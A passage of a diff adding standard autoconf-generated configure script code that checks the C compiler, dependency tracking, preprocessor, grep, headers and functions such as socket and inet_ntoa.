AC_CACHE_VAL +case "x$ac_cv_prog_cc_c89" in + x) + { $as_echo "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 +$as_echo "none needed" >&6; } ;; + xno) + { $as_echo "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 +$as_echo "unsupported" >&6; } ;; + *) + CC="$CC $ac_cv_prog_cc_c89" + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c89" >&5 +$as_echo "$ac_cv_prog_cc_c89" >&6; } ;; +esac +if test "x$ac_cv_prog_cc_c89" != xno; then : + +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + +depcc="$CC" am_compiler_list= + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CC_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_CC_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` + fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_CC_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_CC_dependencies_compiler_type=none +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CC_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CC_dependencies_compiler_type" >&6; } +CCDEPMODE=depmode=$am_cv_CC_dependencies_compiler_type + + if + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CC_dependencies_compiler_type" = gcc3; then + am__fastdepCC_TRUE= + am__fastdepCC_FALSE='#' +else + am__fastdepCC_TRUE='#' + am__fastdepCC_FALSE= +fi + + +if test "x$CC" != xcc; then + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC and cc understand -c and -o together" >&5 +$as_echo_n "checking whether $CC and cc understand -c and -o together... " >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether cc understands -c and -o together" >&5 +$as_echo_n "checking whether cc understands -c and -o together... " >&6; } +fi +set dummy $CC; ac_cc=`$as_echo "$2" | + sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` +if { as_var=ac_cv_prog_cc_${ac_cc}_c_o; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +# Make sure it works both with $CC and with simple cc. +# We do the test twice because some compilers refuse to overwrite an +# existing .o file with -o, though they will create one. +ac_try='$CC -c conftest.$ac_ext -o conftest2.$ac_objext >&5' +rm -f conftest2.* +if { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; +then + eval ac_cv_prog_cc_${ac_cc}_c_o=yes + if test "x$CC" != xcc; then + # Test first that cc exists at all. + if { ac_try='cc -c conftest.$ac_ext >&5' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then + ac_try='cc -c conftest.$ac_ext -o conftest2.$ac_objext >&5' + rm -f conftest2.* + if { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; + then + # cc works too. + : + else + # cc exists but doesn't like -o. + eval ac_cv_prog_cc_${ac_cc}_c_o=no + fi + fi + fi +else + eval ac_cv_prog_cc_${ac_cc}_c_o=no +fi +rm -f core conftest* + +fi +if eval test \$ac_cv_prog_cc_${ac_cc}_c_o = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + +$as_echo "@%:@define NO_MINUS_C_MINUS_O 1" >>confdefs.h + +fi + +# FIXME: we rely on the cache variable name because +# there is no other way. +set dummy $CC +am_cc=`echo $2 | sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` +eval am_t=\$ac_cv_prog_cc_${am_cc}_c_o +if test "$am_t" != yes; then + # Losing compiler, so override with the script. + # FIXME: It is wrong to rewrite CC. + # But if we don't then we get into trouble of one sort or another. + # A longer-term fix would be to have automake use am__CC in this case, + # and then we could set am__CC="\$(top_srcdir)/compile \$(CC)" + CC="$am_aux_dir/compile $CC" +fi + + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat >conftest.make <<\_ACEOF +SHELL = /bin/sh +all: + @echo '@@@%%%=$(MAKE)=@@@%%%' +_ACEOF +# GNU make sometimes prints "make[1]: Entering...", which would confuse us. +case `${MAKE-make} -f conftest.make 2>/dev/null` in + *@@@%%%=?*=@@@%%%*) + eval ac_cv_prog_make_${ac_make}_set=yes;; + *) + eval ac_cv_prog_make_${ac_make}_set=no;; +esac +rm -f conftest.make +fi +if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } + SET_MAKE= +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + SET_MAKE="MAKE=${MAKE-make}" +fi + + +# Checks for libraries. + +# Checks for header files. + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking how to run the C preprocessor" >&5 +$as_echo_n "checking how to run the C preprocessor... " >&6; } +# On Suns, sometimes $CPP names a directory. +if test -n "$CPP" && test -d "$CPP"; then + CPP= +fi +if test -z "$CPP"; then + if test "${ac_cv_prog_CPP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + # Double quotes because CPP needs to be expanded + for CPP in "$CC -E" "$CC -E -traditional-cpp" "/lib/cpp" + do + ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@ifdef __STDC__ +@%:@ include +@%:@else +@%:@ include +@%:@endif + Syntax error +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + +else + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether nonexistent headers + # can be detected and how. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + # Broken: success on invalid input. +continue +else + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then : + break +fi + + done + ac_cv_prog_CPP=$CPP + +fi + CPP=$ac_cv_prog_CPP +else + ac_cv_prog_CPP=$CPP +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $CPP" >&5 +$as_echo "$CPP" >&6; } +ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@ifdef __STDC__ +@%:@ include +@%:@else +@%:@ include +@%:@endif + Syntax error +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + +else + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether nonexistent headers + # can be detected and how. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + # Broken: success on invalid input. +continue +else + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then : + +else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "C preprocessor \"$CPP\" fails sanity check +See \`config.log' for more details." "$LINENO" 5; } +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for grep that handles long lines and -e" >&5 +$as_echo_n "checking for grep that handles long lines and -e... " >&6; } +if test "${ac_cv_path_GREP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$GREP"; then + ac_path_GREP_found=false + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in grep ggrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_GREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_GREP" && $as_test_x "$ac_path_GREP"; } || continue +# Check for GNU ac_path_GREP and select it if it is found. + # Check for GNU $ac_path_GREP +case `"$ac_path_GREP" --version 2>&1` in +*GNU*) + ac_cv_path_GREP="$ac_path_GREP" ac_path_GREP_found=:;; +*) + ac_count=0 + $as_echo_n 0123456789 >"conftest.in" + while : + do + cat "conftest.in" "conftest.in" >"conftest.tmp" + mv "conftest.tmp" "conftest.in" + cp "conftest.in" "conftest.nl" + $as_echo 'GREP' >> "conftest.nl" + "$ac_path_GREP" -e 'GREP$' -e '-(cannot match)-' < "conftest.nl" >"conftest.out" 2>/dev/null || break + diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break + as_fn_arith $ac_count + 1 && ac_count=$as_val + if test $ac_count -gt ${ac_path_GREP_max-0}; then + # Best one so far, save it but keep looking for a better one + ac_cv_path_GREP="$ac_path_GREP" + ac_path_GREP_max=$ac_count + fi + # 10*(2^10) chars as input seems more than enough + test $ac_count -gt 10 && break + done + rm -f conftest.in conftest.tmp conftest.nl conftest.out;; +esac + + $ac_path_GREP_found && break 3 + done + done + done +IFS=$as_save_IFS + if test -z "$ac_cv_path_GREP"; then + as_fn_error "no acceptable grep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi +else + ac_cv_path_GREP=$GREP +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_GREP" >&5 +$as_echo "$ac_cv_path_GREP" >&6; } + GREP="$ac_cv_path_GREP" + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for egrep" >&5 +$as_echo_n "checking for egrep... " >&6; } +if test "${ac_cv_path_EGREP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if echo a | $GREP -E '(a|b)' >/dev/null 2>&1 + then ac_cv_path_EGREP="$GREP -E" + else + if test -z "$EGREP"; then + ac_path_EGREP_found=false + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in egrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_EGREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_EGREP" && $as_test_x "$ac_path_EGREP"; } || continue +# Check for GNU ac_path_EGREP and select it if it is found. + # Check for GNU $ac_path_EGREP +case `"$ac_path_EGREP" --version 2>&1` in +*GNU*) + ac_cv_path_EGREP="$ac_path_EGREP" ac_path_EGREP_found=:;; +*) + ac_count=0 + $as_echo_n 0123456789 >"conftest.in" + while : + do + cat "conftest.in" "conftest.in" >"conftest.tmp" + mv "conftest.tmp" "conftest.in" + cp "conftest.in" "conftest.nl" + $as_echo 'EGREP' >> "conftest.nl" + "$ac_path_EGREP" 'EGREP$' < "conftest.nl" >"conftest.out" 2>/dev/null || break + diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break + as_fn_arith $ac_count + 1 && ac_count=$as_val + if test $ac_count -gt ${ac_path_EGREP_max-0}; then + # Best one so far, save it but keep looking for a better one + ac_cv_path_EGREP="$ac_path_EGREP" + ac_path_EGREP_max=$ac_count + fi + # 10*(2^10) chars as input seems more than enough + test $ac_count -gt 10 && break + done + rm -f conftest.in conftest.tmp conftest.nl conftest.out;; +esac + + $ac_path_EGREP_found && break 3 + done + done + done +IFS=$as_save_IFS + if test -z "$ac_cv_path_EGREP"; then + as_fn_error "no acceptable egrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi +else + ac_cv_path_EGREP=$EGREP +fi + + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_EGREP" >&5 +$as_echo "$ac_cv_path_EGREP" >&6; } + EGREP="$ac_cv_path_EGREP" + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for ANSI C header files" >&5 +$as_echo_n "checking for ANSI C header files... " >&6; } +if test "${ac_cv_header_stdc+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#include +#include + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_header_stdc=yes +else + ac_cv_header_stdc=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + +if test $ac_cv_header_stdc = yes; then + # SunOS 4.x string.h does not declare mem*, contrary to ANSI. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "memchr" >/dev/null 2>&1; then : + +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "free" >/dev/null 2>&1; then : + +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. + if test "$cross_compiling" = yes; then : + : +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#if ((' ' & 0x0FF) == 0x020) +# define ISLOWER(c) ('a' <= (c) && (c) <= 'z') +# define TOUPPER(c) (ISLOWER(c) ? 'A' + ((c) - 'a') : (c)) +#else +# define ISLOWER(c) \ + (('a' <= (c) && (c) <= 'i') \ + || ('j' <= (c) && (c) <= 'r') \ + || ('s' <= (c) && (c) <= 'z')) +# define TOUPPER(c) (ISLOWER(c) ? ((c) | 0x40) : (c)) +#endif + +#define XOR(e, f) (((e) && !(f)) || (!(e) && (f))) +int +main () +{ + int i; + for (i = 0; i < 256; i++) + if (XOR (islower (i), ISLOWER (i)) + || toupper (i) != TOUPPER (i)) + return 2; + return 0; +} +_ACEOF +if ac_fn_c_try_run "$LINENO"; then : + +else + ac_cv_header_stdc=no +fi +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext +fi + +fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_stdc" >&5 +$as_echo "$ac_cv_header_stdc" >&6; } +if test $ac_cv_header_stdc = yes; then + +$as_echo "@%:@define STDC_HEADERS 1" >>confdefs.h + +fi + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for sys/wait.h that is POSIX.1 compatible" >&5 +$as_echo_n "checking for sys/wait.h that is POSIX.1 compatible... " >&6; } +if test "${ac_cv_header_sys_wait_h+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#ifndef WEXITSTATUS +# define WEXITSTATUS(stat_val) ((unsigned int) (stat_val) >> 8) +#endif +#ifndef WIFEXITED +# define WIFEXITED(stat_val) (((stat_val) & 255) == 0) +#endif + +int +main () +{ + int s; + wait (&s); + s = WIFEXITED (s) ? WEXITSTATUS (s) : 1; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_header_sys_wait_h=yes +else + ac_cv_header_sys_wait_h=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_sys_wait_h" >&5 +$as_echo "$ac_cv_header_sys_wait_h" >&6; } +if test $ac_cv_header_sys_wait_h = yes; then + +$as_echo "@%:@define HAVE_SYS_WAIT_H 1" >>confdefs.h + +fi + +# On IRIX 5.3, sys/types and inttypes.h are conflicting. +for ac_header in sys/types.h sys/stat.h stdlib.h string.h memory.h strings.h \ + inttypes.h stdint.h unistd.h +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default +" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 +_ACEOF + +fi + +done + + +for ac_header in fcntl.h limits.h netdb.h netinet/in.h stdlib.h string.h sys/ioctl.h sys/socket.h sys/timeb.h syslog.h unistd.h +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 +_ACEOF + +fi + +done + + +# Checks for typedefs, structures, and compiler characteristics. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for an ANSI C-conforming const" >&5 +$as_echo_n "checking for an ANSI C-conforming const... " >&6; } +if test "${ac_cv_c_const+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +/* FIXME: Include the comments suggested by Paul. */ +#ifndef __cplusplus + /* Ultrix mips cc rejects this. */ + typedef int charset[2]; + const charset cs; + /* SunOS 4.1.1 cc rejects this. */ + char const *const *pcpcc; + char **ppc; + /* NEC SVR4.0.2 mips cc rejects this. */ + struct point {int x, y;}; + static struct point const zero = {0,0}; + /* AIX XL C 1.02.0.0 rejects this. + It does not let you subtract one const X* pointer from another in + an arm of an if-expression whose if-part is not a constant + expression */ + const char *g = "string"; + pcpcc = &g + (g ? g-g : 0); + /* HPUX 7.0 cc rejects these. */ + ++pcpcc; + ppc = (char**) pcpcc; + pcpcc = (char const *const *) ppc; + { /* SCO 3.2v4 cc rejects this. */ + char *t; + char const *s = 0 ? (char *) 0 : (char const *) 0; + + *t++ = 0; + if (s) return 0; + } + { /* Someone thinks the Sun supposedly-ANSI compiler will reject this. */ + int x[] = {25, 17}; + const int *foo = &x[0]; + ++foo; + } + { /* Sun SC1.0 ANSI compiler rejects this -- but not the above. */ + typedef const int *iptr; + iptr p = 0; + ++p; + } + { /* AIX XL C 1.02.0.0 rejects this saying + "k.c", line 2.27: 1506-025 (S) Operand must be a modifiable lvalue. */ + struct s { int j; const int *ap[3]; }; + struct s *b; b->j = 5; + } + { /* ULTRIX-32 V3.1 (Rev 9) vcc rejects this */ + const int foo = 10; + if (!foo) return 0; + } + return !cs[0] && !zero.x; +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_c_const=yes +else + ac_cv_c_const=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_const" >&5 +$as_echo "$ac_cv_c_const" >&6; } +if test $ac_cv_c_const = no; then + +$as_echo "@%:@define const /**/" >>confdefs.h + +fi + +ac_fn_c_check_type "$LINENO" "size_t" "ac_cv_type_size_t" "$ac_includes_default" +if test "x$ac_cv_type_size_t" = x""yes; then : + +else + +cat >>confdefs.h <<_ACEOF +@%:@define size_t unsigned int +_ACEOF + +fi + + +# Checks for library functions. +for ac_header in stdlib.h +do : + ac_fn_c_check_header_mongrel "$LINENO" "stdlib.h" "ac_cv_header_stdlib_h" "$ac_includes_default" +if test "x$ac_cv_header_stdlib_h" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define HAVE_STDLIB_H 1 +_ACEOF + +fi + +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for GNU libc compatible malloc" >&5 +$as_echo_n "checking for GNU libc compatible malloc... " >&6; } +if test "${ac_cv_func_malloc_0_nonnull+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test "$cross_compiling" = yes; then : + ac_cv_func_malloc_0_nonnull=no +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#if defined STDC_HEADERS || defined HAVE_STDLIB_H +# include +#else +char *malloc (); +#endif + +int +main () +{ +return ! malloc (0); + ; + return 0; +} +_ACEOF +if ac_fn_c_try_run "$LINENO"; then : + ac_cv_func_malloc_0_nonnull=yes +else + ac_cv_func_malloc_0_nonnull=no +fi +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_func_malloc_0_nonnull" >&5 +$as_echo "$ac_cv_func_malloc_0_nonnull" >&6; } +if test $ac_cv_func_malloc_0_nonnull = yes; then : + +$as_echo "@%:@define HAVE_MALLOC 1" >>confdefs.h + +else + $as_echo "@%:@define HAVE_MALLOC 0" >>confdefs.h + + case " $LIB@&t@OBJS " in + *" malloc.$ac_objext "* ) ;; + *) LIB@&t@OBJS="$LIB@&t@OBJS malloc.$ac_objext" + ;; +esac + + +$as_echo "@%:@define malloc rpl_malloc" >>confdefs.h + +fi + + +for ac_func in inet_ntoa memset socket +do : + as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh` +ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var" +eval as_val=\$$as_ac_var + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1 +_ACEOF + +fi +done + + +ac_config_files="$ac_config_files Makefile src/Makefile tools/Makefile" + +cat >confcache <<\_ACEOF +# This file is a shell script that caches the results of configure +# tests run on this system so they can be shared between configure +# scripts and configure runs, see configure's option --config-cache. +# It is not useful on other systems. If it contains results you don't +# want to keep, you may remove or edit it. +# +# config.status only pays attention to the cache file if you give it +# the --recheck option to rerun configure. +# +# `ac_cv_env_foo' variables (set or unset) will be overridden when +# loading this file, other *unset* `ac_cv_foo' will be assigned the +# following values. + +_ACEOF + +# The following way of writing the cache mishandles newlines in values, +# but we know of no workaround that is simple, portable, and efficient. +# So, we kill variables containing newlines. +# Ultrix sh set writes to stderr and can't be redirected directly, +# and sets the high bit in the cache file unless we assign to the vars. 